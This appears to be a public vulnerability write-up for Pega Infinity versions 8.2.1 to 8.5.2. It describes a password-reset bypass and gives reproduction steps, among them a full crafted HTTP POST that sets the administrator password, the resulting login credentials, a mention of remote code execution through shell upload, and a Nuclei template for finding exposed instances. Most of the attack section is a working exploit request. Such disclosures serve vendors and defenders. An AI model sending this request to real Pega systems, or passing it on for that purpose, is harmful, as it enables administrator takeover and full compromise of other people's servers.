└── RCE.md


/RCE.md:
--------------------------------------------------------------------------------
 1 | ## Summary
 2 | An attacker can bypass all stages of the password reset flow and reset any user's account on Pega infinity. This is done by (1) initiating the password reset flow and typing in the victim email, then (2) forcing the HTTP POST request to update the password through. An attacker could login using the newly edited account and fully compromise the Pega instance via the many acceptable post-auth code execution vectors (modifying dynamic pages, templating, etc.)
 3 | 
 4 | ## Steps to Reproduce
 5 | 1. Browse to the login page of any Pega instance
 6 | 2. Click "reset password"
 7 | 3. Type in "administrator@pega.com", proxy the HTTP request, send the HTTP request with the "administrator@pega.com" to the Burp repeater tab or any similar tab, then allow the request to go through by disabling the proxy or clicking "send"
 8 | 4. After allowing the initial request to go through, modify the HTTP requests body in the repeater so it includes the following data...
 9 | 
10 | ```
11 | POST /prweb/PRServlet/app/default/:PEGA_ID*/!STANDARD HTTP/1.1 (:PEGA_ID is a unique ID for each site, it is in this format: ZOgwf2Zk3OsEg_oG74MXXxG2bXKbv56W)
12 | Host: redacted.com
13 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
14 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
15 | Accept-Language: en-US,en;q=0.5
16 | Accept-Encoding: gzip, deflate
17 | Content-Type: application/x-www-form-urlencoded
18 | Content-Length: 112
19 | Origin: https://redacted.com
20 | DNT: 1
21 | Connection: close
22 | Referer: https://redacted.com/prweb/PRServlet/app/default/:PEGA_ID*/!STANDARD
23 | Cookie: yourCookie
24 | Upgrade-Insecure-Requests: 1
25 | 
26 | pzAuth=guest&NewPassword=Rules%401234&ConfPassword=Rules%401234&pyActivity%3DCode-Security.pzChangeUserPassword=
27 | ```
28 | 
29 | 5. Login using the following credentials after sending the HTTP request, having bypassed the confirmation part of reset password and being able to login to the administrator account...
30 | 
31 | ```
32 | administrator@pega.com / Rules@1234
33 | ```
34 | 
35 | 6. From there, you can achieve RCE via any of the many accepted use administrator-only code execution vectors
36 | 
37 | ## Affected Versions
38 | Pega Infinity >= 8.2.1
39 | Pega Infinity <= 8.5.2
40 | 
41 | ## Impact
42 | Full compromise of any Pega instance with no prerequisite knowledge.
43 | 
44 | ## Supporting Media
45 | ![Password bypass](https://i.imgur.com/kxLRhys.png)
46 | * Password bypass
47 | 
48 | ![Remote code execution via shell upload](https://i.imgur.com/zC8kOfG.png)
49 | * Remote code execution via shell upload
50 | 
51 | ## Nuclei Template
52 | ```
53 | id: pega
54 | 
55 | info:
56 |   name: Pega Infinity Login
57 |   author: sshell
58 |   severity: low
59 | 
60 | requests:
61 |   - method: GET
62 |     path:
63 |       - "{{BaseURL}}/prweb/PRRestService/unauthenticatedAPI/v1/docs"
64 |     headers:
65 |       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
66 |     matchers:
67 |       - type: word
68 |         words:
69 |           - "Pega API"
70 | ```
71 | 
72 | ## Credit
73 | Samuel Curry (@samwcyo), Brett Buerhaus (@bbuerhaus), Maik Robert (@xEHLE_), Justin Rhinehart (@sshell_)
74 | 


--------------------------------------------------------------------------------